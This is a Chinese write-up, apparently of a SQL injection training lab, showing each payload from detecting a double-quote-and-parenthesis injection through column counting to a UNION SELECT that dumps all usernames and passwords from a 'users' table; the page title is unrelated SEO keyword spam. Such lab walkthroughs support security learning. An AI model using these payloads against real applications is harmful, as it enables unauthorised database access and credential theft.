您的位置:首页 > 财经 > 金融 > 番禺厂家搜索seo_郑州的设计公司_网络舆情分析报告_谷歌商店官网下载

番禺厂家搜索seo_郑州的设计公司_网络舆情分析报告_谷歌商店官网下载

2025/1/7 21:48:50 来源:https://blog.csdn.net/2401_88326437/article/details/144929198  浏览:    关键词:番禺厂家搜索seo_郑州的设计公司_网络舆情分析报告_谷歌商店官网下载
番禺厂家搜索seo_郑州的设计公司_网络舆情分析报告_谷歌商店官网下载

判断注入类型

GET1" and "1"="1,回显如下:
在这里插入图片描述
GET1" and "1"="2
在这里插入图片描述没有回显,说明该漏洞类型为GET型双引号字符型注入

判断注入点个数

GET1" order by 3 --+
在这里插入图片描述

由上图可知,sql语法中给$id加上了()
猜测后端语句为SELECT * FROM xx where id=("$id")
故构造GET1') order by 3 --+,此时后端语句为SELECT * FROM xx where id=("1") order by 3 --+")
即SELECT * FROM xx where id=("-1") order by 3

GET1") order by 3 --+

在这里插入图片描述GET1") order by 4 --+
在这里插入图片描述故注入点为3

查库名

GET-1") union select 1,2,database(); --+
回显库名security
在这里插入图片描述

查表名

-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

回显四个表名

在这里插入图片描述

查users表的列名

-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+

在这里插入图片描述

查字段

Payload:-1") union select 1,group_concat(username),group_concat(password) from 库名.表名; --+
实例如下:

-1") union select 1,group_concat(username),group_concat(password) from security.users; --+

在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com